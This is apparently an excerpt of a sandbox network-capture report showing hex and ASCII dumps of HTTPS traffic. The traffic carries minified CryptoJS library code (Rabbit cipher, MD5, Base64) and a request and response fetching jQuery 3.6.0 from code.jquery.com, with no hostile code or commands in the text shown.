                                                                                                                                                                                                  2025-01-14 22:37:50 UTC1369INData Raw: 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3f 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 69 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 76 61 72 20 72 3d 4f 62 6a 65 63 74 2e
                                                                                                                                                                                                  Data Ascii: peof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.
                                                                                                                                                                                                  2025-01-14 22:37:50 UTC1369INData Raw: 6e 65 2e 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 77 6f 72 64 73 3d 74 68 69 73 2e 77 6f 72 64 73 2e 73 6c 69 63 65 28 30 29 2c 74 7d 2c 72 61 6e 64 6f 6d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 72 3d 30 3b 72 3c 74 3b 72 2b 3d 34 29 65 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 69 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 28 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 31 29 29 5b 30 5d 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 72 61 6e 64 6f 6d 42 79
                                                                                                                                                                                                  Data Ascii: ne.call(this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.randomBy
                                                                                                                                                                                                  2025-01-14 22:37:50 UTC1369INData Raw: 3d 74 79 70 65 6f 66 20 74 26 26 28 74 3d 66 2e 70 61 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 68 2e 63 65 69 6c 28 73 29 3a 68 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 6e 3d 68 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 61 3d 30 3b
                                                                                                                                                                                                  Data Ascii: =typeof t&&(t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(var a=0;
                                                                                                                                                                                                  2025-01-14 22:37:50 UTC1369INData Raw: 6f 72 28 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 45 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 45 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 45 5b 31 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 33 5d 3d 65 5b 33 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 32 5d 3e 3e 3e 30 3c 45 5b 32 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 34 5d 3d 65 5b 34 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 33 5d 3e 3e 3e 30 3c 45 5b 33 5d
                                                                                                                                                                                                  Data Ascii: or(var t=this._X,e=this._C,r=0;r<8;r++)E[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<E[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<E[1]>>>0?1:0)|0,e[3]=e[3]+1295307597+(e[2]>>>0<E[2]>>>0?1:0)|0,e[4]=e[4]+3545052371+(e[3]>>>0<E[3]
                                                                                                                                                                                                  2025-01-14 22:37:50 UTC1369INData Raw: 3a 30 3b 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 3b 49 5b 72 5d 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 5e 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33 35 26 69 29 2a 69 7c 30 29 7d 74 5b 30 5d 3d 49 5b 30 5d 2b 28 49 5b 37 5d 3c 3c 31 36 7c 49 5b 37 5d 3e 3e 3e 31 36 29 2b 28 49 5b 36 5d 3c 3c 31 36 7c 49 5b 36 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 31 5d 3d 49 5b 31 5d 2b 28 49 5b 30 5d 3c 3c 38 7c 49 5b 30 5d 3e 3e 3e 32 34 29 2b 49 5b 37 5d 7c 30 2c 74 5b 32 5d 3d 49 5b 32 5d 2b 28 49 5b 31 5d 3c 3c 31 36 7c 49 5b 31 5d 3e 3e 3e 31 36 29 2b 28 49 5b 30 5d 3c 3c 31 36 7c
                                                                                                                                                                                                  Data Ascii: :0;for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16;I[r]=((n*n>>>17)+n*o>>>15)+o*o^((4294901760&i)*i|0)+((65535&i)*i|0)}t[0]=I[0]+(I[7]<<16|I[7]>>>16)+(I[6]<<16|I[6]>>>16)|0,t[1]=I[1]+(I[0]<<8|I[0]>>>24)+I[7]|0,t[2]=I[2]+(I[1]<<16|I[1]>>>16)+(I[0]<<16|
                                                                                                                                                                                                  2025-01-14 22:37:50 UTC1369INData Raw: 66 66 65 72 2c 74 2e 62 79 74 65 4f 66 66 73 65 74 2c 74 2e 62 79 74 65 4c 65 6e 67 74 68 29 3a 74 29 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b 73 74 72 69 6e 67 69 66
                                                                                                                                                                                                  Data Ascii: ffer,t.byteOffset,t.byteLength):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={stringif
                                                                                                                                                                                                  2025-01-14 22:37:50 UTC1369INData Raw: 72 2e 63 68 61 72 41 74 28 36 34 29 3b 72 65 74 75 72 6e 21 6f 7c 7c 2d 31 21 3d 3d 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d
                                                                                                                                                                                                  Data Ascii: r.charAt(64);return!o||-1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLM
                                                                                                                                                                                                  2025-01-14 22:37:50 UTC1369INData Raw: 62 73 28 61 2e 73 69 6e 28 74 2b 31 29 29 7c 30 7d 28 29 3b 65 3d 65 2e 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61 72 20 6f 3d
                                                                                                                                                                                                  Data Ascii: bs(a.sin(t+1))|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}var o=
                                                                                                                                                                                                  2025-01-14 22:37:50 UTC1369INData Raw: 33 39 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77 2c 31
                                                                                                                                                                                                  Data Ascii: 39]),m=C(m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w,1


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                  6192.168.2.1649712151.101.2.1374436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                  2025-01-14 22:37:49 UTC358OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                                                                                                                                                  Host: code.jquery.com
                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                  2025-01-14 22:37:50 UTC613INHTTP/1.1 200 OK
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Content-Length: 89501
                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                  Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                  Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                                                                                                                                  ETag: "28feccc0-15d9d"
                                                                                                                                                                                                  Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                  Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                  Via: 1.1 varnish, 1.1 varnish
                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                  Age: 2378796
                                                                                                                                                                                                  Date: Tue, 14 Jan 2025 22:37:50 GMT
                                                                                                                                                                                                  X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740046-EWR
                                                                                                                                                                                                  X-Cache: HIT, HIT
                                                                                                                                                                                                  X-Cache-Hits: 2774, 0
                                                                                                                                                                                                  X-Timer: S1736894270.033170,VS0,VE5
                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                  2025-01-14 22:37:50 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                                                                                                                                                  Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                                                                                                                                                  2025-01-14 22:37:50 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                                                                                                                                                                                                  Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
                                                                                                                                                                                                  2025-01-14 22:37:50 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                                                                                                                                                                                                  Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                                                                                                                                                                                                  2025-01-14 22:37:50 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                                                                                                                                                                                                  Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
                                                                                                                                                                                                  2025-01-14 22:37:50 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
                                                                                                                                                                                                  Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
                                                                                                                                                                                                  2025-01-14 22:37:50 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 79 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28
                                                                                                                                                                                                  Data Ascii: )){(f=ee.test(t)&&ye(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(
                                                                                                                                                                                                  2025-01-14 22:37:50 UTC1378INData Raw: 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e 73 75 70 70 6f 72 74 3d 7b 7d 2c 69 3d 73 65 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c
                                                                                                                                                                                                  Data Ascii: ion(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument|
                                                                                                                                                                                                  2025-01-14 22:37:50 UTC1378INData Raw: 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28
